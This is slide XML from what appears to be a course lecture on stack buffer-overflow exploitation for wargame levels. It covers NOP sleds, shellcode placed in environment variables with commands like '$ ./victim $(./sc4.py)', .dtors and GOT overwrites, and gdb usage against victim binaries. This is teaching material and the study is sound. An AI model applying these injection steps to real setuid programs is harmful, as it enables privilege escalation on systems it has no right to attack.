                        <a:t> of buffer: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/bin/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>shxAAAABBBB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5473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>saved </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>bp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AAAA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5473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>ret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addr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4885774" y="6526307"/>
            <a:ext cx="2017059" cy="0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H="1" flipV="1">
            <a:off x="5248844" y="4872319"/>
            <a:ext cx="3290046" cy="1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441576" y="3227294"/>
            <a:ext cx="1452293" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="med" len="lg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100047" y="3693459"/>
            <a:ext cx="1936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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> points </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ANYwhere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> among these NOP bytes, we win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37412" y="1712260"/>
            <a:ext cx="1636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 of sled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>will depend</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on buffer space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>available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Small buffers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can inject code by passing into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> instead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This assumes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> get to invoke the program so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> control the environment (not always true!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can always do this on razor since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> run the victims</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I prefer to always put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> when possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[0], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>envp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envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is an array of pointers to strings just like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bash passes in this array from your shell’s environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>you can also pass it in via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>you’ll need to do this on one of the razor levels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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>env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easiest way is to export a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the shell and then invoke the victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No oppressive size restrictions means a big sled is fine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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$ export SC=$(./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envsc.py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/>
              <a:t>then find the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, put in sc4.py and go</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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$ ./victim $(./sc4.py)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I prefer this method when possible since you can have big sleds and more address stability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Buffer overflow, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>env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070315"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="295838" y="1575431"/>
          <a:ext cx="5136777" cy="5302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2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22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6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buffer2</a:t>
                      </a:r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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(and %</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1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esp</a:t>
                      </a:r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)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0xfffff7f8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0xfffff7fc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0xfffff800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0xfffff804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buffer1</a:t>
                      </a:r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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0xfffff808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0xfffff80c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0xfffff810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latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> ret </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>addr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0xfffff814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ourier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>envp</a:t>
                      </a:r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[18]</a:t>
                      </a:r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  <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t>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SC=0x90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> 0x90 0x90 0x90 …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0xfffffc10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818094" y="1801906"/>
            <a:ext cx="30211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we overwrite buffer1 with the same thing over and over: the address of the (approximate) NOP sled in high memory on the stack where the environment variables live.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is possible only when you can set environment variables.  If you can, this method allows you to work with small buffers, allows a large sled, and has more memory stability.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Oval 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286004" y="3854824"/>
            <a:ext cx="277905" cy="2779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72875" y="3854823"/>
            <a:ext cx="277905" cy="2779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850780" y="3854823"/>
            <a:ext cx="277905" cy="2779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137651" y="3854823"/>
            <a:ext cx="277905" cy="2779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303934" y="4222377"/>
            <a:ext cx="277905" cy="2779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590805" y="4222376"/>
            <a:ext cx="277905" cy="2779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868710" y="4222376"/>
            <a:ext cx="277905" cy="2779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155581" y="4222376"/>
            <a:ext cx="277905" cy="2779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303934" y="4580965"/>
            <a:ext cx="277905" cy="2779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590805" y="4580964"/>
            <a:ext cx="277905" cy="2779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868710" y="4580964"/>
            <a:ext cx="277905" cy="2779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155581" y="4580964"/>
            <a:ext cx="277905" cy="2779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312899" y="4966447"/>
            <a:ext cx="277905" cy="2779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599770" y="4966446"/>
            <a:ext cx="277905" cy="2779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877675" y="4966446"/>
            <a:ext cx="277905" cy="2779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164546" y="4966446"/>
            <a:ext cx="277905" cy="2779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297134" y="5339565"/>
            <a:ext cx="277905" cy="2779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584005" y="5339564"/>
            <a:ext cx="277905" cy="2779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861910" y="5339564"/>
            <a:ext cx="277905" cy="2779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148781" y="5339564"/>
            <a:ext cx="277905" cy="2779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53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injection spots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Sometimes you can overwrite an entry in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dtors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or the global-offset table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Helps if victim is executing exit() instead of returning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Required for vortex3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The razor challenges have a lot of variants on what we’ve just seen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You’re about to get pretty good at injecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr 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Organization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72870" y="1568825"/>
          <a:ext cx="3675529" cy="4914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5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73173">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Text (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>ie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>, Program Code)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881">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Data (Initialized static/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>globals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881">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>BSS (Uninitialized static/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>globals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899">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Heap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85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31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236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2881">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>env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rot="16200000" flipH="1">
            <a:off x="3097305" y="4235823"/>
            <a:ext cx="627530" cy="896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6200000" flipV="1">
            <a:off x="3137648" y="5387788"/>
            <a:ext cx="573744" cy="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Moral of the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Get really good at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>debugger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>persistent/obsessive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pick up some Unix Programming skills along the way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can get by glossing over them, but don’t</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>early</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on the HWs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you pair with someone else, be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>involved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in every level, even if only at the discussion level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your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdbfu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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These are the commands I use most often in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, b line#, b *&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> r [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reg_name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where, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x/##&lt;f&gt;&lt;s&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>## is decimal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;f&gt; is o, x, d, u, t, f, a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, c, s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;s&gt; is b, h, w, g</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>p/same   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>expr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a hex/octal/decimal calculator (almost binary too)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lineno</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>disas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lineno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> won’t let you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>disas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> some memory; use x/##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addr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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdbfu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And…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>help &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd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r &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>args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cont</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>n, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, s, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>si</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;enter&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;tab&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set follow-fork-mode child</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>expr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>val</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>disp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $pc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lmgtfy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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Hey, wait… can’t I just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the victim?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You can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the victim binaries, but…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They’re stripped at times</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>nm, strip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They drop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>egid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>because of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ptrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (see next slide)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often not a bad idea in order to get more accurate addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Still </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> perturbs things, so use a sled or put your exploit in a fork loop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I often still rebuild the source and operate locally so I can have –g </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>victims don’t have –g turned on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note: some levels were compiled with an older compiler and won’t be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>perfectly reproduced when you compile them!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ptrace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PT_ATTACH This request allows a process to gain control of an otherwise unrelated process and begin tracing it. It does not need any cooperation from the to-be-traced process. In this case,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specifies the process ID of the to-be-traced process, and the other two arguments are ignored. This request requires that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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target process must have the same real UID as the tracing process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and that it must </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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not be executing a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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setgid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executable. (If the tracing process is running as root, these restrictions do not apply.) The tracing process will see the newly-traced process stop and may then control it as if it had been traced all along.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Three other restrictions apply to all tracing processes, even those running as root. First, </a:t>
            </a:r>
            <a:r>
